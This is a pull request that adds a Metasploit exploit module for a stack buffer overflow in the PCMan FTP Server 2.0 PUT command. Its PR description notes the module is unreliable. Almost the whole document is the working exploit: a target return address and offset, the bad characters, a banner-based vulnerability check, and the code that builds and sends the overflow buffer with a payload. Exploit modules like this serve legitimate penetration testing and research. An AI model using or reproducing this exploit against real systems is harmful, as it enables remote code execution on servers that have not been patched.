### PR TITLE
Move PCMan FTP Server Exploit to unstable

### DIFF
--- a/unstable-modules/exploits/incomplete/windows/ftp/pcman_put.rb
+++ b/unstable-modules/exploits/incomplete/windows/ftp/pcman_put.rb
@@ -1,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'			 => 'PCMan FTP Server PUT Command Buffer Overflow',
+      'Description'	 => %q{
+          PCMan FTP Server 2.0 is prone to an overflow condition. It
+        fails to properly sanitize user-supplied input resulting in a
+        stack-based buffer overflow. With a specially crafted 'PUT'
+        command, a remote attacker can potentially have an unspecified
+        impact.
+      },
+      'Platform'		 => 'win',
+      'Author'		 =>
+        [
+          'Jay Turla'
+        ],
+      'License'		 => MSF_LICENSE,
+      'References'	 =>
+        [
+          [ 'EDB', '37731'],
+          [ 'OSVDB', '94624']
+        ],
+      'Privileged'	 => false,
+      'DefaultOptions'   =>
+        {
+          'EXITFUNC' => 'process',
+        },
+      'Payload'		 =>
+        {
+          'Space'          => 1000,
+          'BadChars'       => "\x00\xff\x0a\x0d\x20\x40"
+        },
+      'Targets'		=>
+        [
+          [ 'Windows XP SP3 English',
+            {
+              'Ret' => 0x77c35459, # jmp esp from msvcrt.dll
+              'Offset'   => 2007
+            }
+          ],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Jun 27 2013'))
+  end
+
+  def check
+    connect
+    disconnect
+    if (banner =~ /220 PCMan's FTP Server 2\.0/)
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    connect_login
+
+    print_status("Trying target #{target.name}...")
+
+    buf = make_nops(target['Offset']) + [target.ret].pack('V')
+    buf << make_nops(30)
+    buf << payload.encoded
+    send_cmd( ['PUT', buf] , false )
+    disconnect
+  end
+end


### PR DESCRIPTION
This PR tries to land https://github.com/rapid7/metasploit-framework/pull/5864 into unstable. The exploit isn't reliable due to the length of the overflowing string being target date length dependent. The full history is available on https://github.com/rapid7/metasploit-framework/pull/5864
